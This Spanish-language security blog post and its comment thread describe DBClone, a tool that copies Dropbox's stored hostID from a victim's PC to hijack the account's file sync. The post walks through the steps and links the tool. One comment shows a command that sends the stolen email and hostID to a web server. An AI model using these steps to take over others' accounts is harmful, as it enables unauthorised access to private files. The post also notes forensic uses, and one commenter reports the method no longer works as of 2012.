Bypass de autenticación en DropBox

DragonJAR 336x280 Bypass de autenticación en DropBox

Hace un tiempo se hizo bastante revuelco cuando se descubrió que Dropbox, ese popular servicio para sincronizar y compartir archivos entre varios equipos, no trataba bien la autenticación en su sistema, De hecho existe una herramienta llamada DB Clone que basándose en las investigaciones publicadas por Derek Newton consigue saltar el proceso de autenticación en DropBox.

dropbox Bypass de autenticación en DropBox

Para usar DbClone tendremos que hacer:

Coger el ejecutable de Dbclone y usarlo en un PC que tenga Dropbox instalado. Una vez lo hayamos usado, nos guardará el hostID y el email de Dropbox en un archivo txt. Nos lo guardamos junto con la base de datos y en nuestro PC donde tenemos Dropbox instalado ejecutamos dbclone ponemos el HostID del equipo, cualquier email y LISTO, tendremos los archivos que se están sincronizando icon smile Bypass de autenticación en DropBox

Aquí podemos ver la prueba de concepto:

dbclone Bypass de autenticación en DropBox

Ejecutamos DBclone

dbclonea Bypass de autenticación en DropBox

Ya tenemos los datos que necesitamos y luego en nuestro PC

asasasp Bypass de autenticación en DropBox

Ya tenemos la base de datos y el hostID y se empezarán a sincronizar los archivos =)

Pero los datos contenidos en la instalación de DropBox, no solo sirven para suplantar la identidad de una cuenta, también se pueden utilizar para realizar un completo análisis forense de los archivos contenidos en esa cuenta de DropBox como nos muestra Pedro Sánchez en su articulo sobre análisis forense en cuentas DropBox.

Puedes descargar la herramienta DBClone creada por Moloch desde este enlace.

Un saludo, espero que este aporte les sea de utilidad.



Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: Seifreed

Formado en un equipo de lucha contra el fraude. He trabajado implementando la protección y prevención del fraude en varios clientes dentro del sector bancario nacional e internacioal. Mi trabajo consiste en encontrar soluciones a los problemas actuales y futuros de las entidades financieras respecto al código malicioso y el fraude. Especialidades como el análisis de malware, análisis forense, ingeniería inversa o tareas de hacking ético, forman parte de mis tareas diarias. Soy ponente ien eventos nacionales (No cON Name, Owasp, Navaja Negra) e internacionales (DraonJAR CON - Colombia). Soy profesor asociado en La Salle enseñando el curso MPWAR (Master in High Performance Web Programming) y el máster de ciberseguridad de La Salle (MCS. Master in Cybersecurity) Miembro de asociaciones y grupos de research como la HoneyNet Project, Owasp, SySsec etc.. También soy el organizador de las conferencias Hack&Beers en Barcelona

Compartir este Artículo
  • http://Maztor.Blogspot.com MaztoR

    pero ya no seria un Bypass 100% directo, si no con un acceso ya establecido,y con configuracion preestablecida para Dropbox, al ver titulo crei que era Bypass en cuentas alternas pero buena info ;)! se agradece!

    • CamiloX

      MaztoR no veo un mal uso de la palabra Bypass en el titulo:

      Bypass, en hacking, forma de esquivar un sistema de seguridad informático;

      Y aquí se esta esquivando la autenticación al evitar digitar el usuario y contraseña (que no conocemos), así tengamos que sacar previamente información de un equipo con dropbox instalado.

      Igual muy buena la información, mi pregunta es DBClone es la herramienta de Oracle que aparece aquí o es otra http://www.dbclone.com/

  • http://www.dragonjar.org DragoN

    @MaztoR aunque no es el típico Bypass donde podemos saltar una medida de seguridad sin necesidad de información adicional, lo que nos comenta nuestro amigo Seifreed en realidad si salta la autenticacion de DropBox aunque tengamos que conseguir previamente alguna información del PC de la victima.

    @CamiloX, la herramienta la puedes encontrar en este enlace, está escrita en python y cuenta con un ejecutable para Windows
    http://www.4shared.com/file/SukoQwHH/dbClone-DragonJARorg.html

  • @nusuga

    Hola DragonN, Probé siguiendo tus indicaciones y me logre la sincronización de cuentas dropbox. tk

    * Y por último, con la opción -m se puede incluso subir el email y el hostid a tu servidor web (vía GET). Por ejemplo, “dbClone.exe -m http://somesite.com

  • Pingback: Dbclone, hackeando Dropbox()

  • http://maztor.blogspot.com MaztoR

    @CamiloX> en ningun momento dige que no fuera Bypass… solo queria aclarar que no es del todo directo, ya que un Bypass directo es el cual saltea medidas o etapas de seguridad inplantadas para proteger (—–) tampoco seria necesaria la info terciaria y como dice @DragoN (en realidad si salta la autenticacion de DropBox aunque tengamos que conseguir previamente alguna información del PC de la victima)

    Espero te haya quedado claro mi opinion, Gracias y Saludos!

  • Crowsuz

    Creo que a día de hoy, en junio de 2012, esto ya no funciona con las nuevas versiones de dropbox.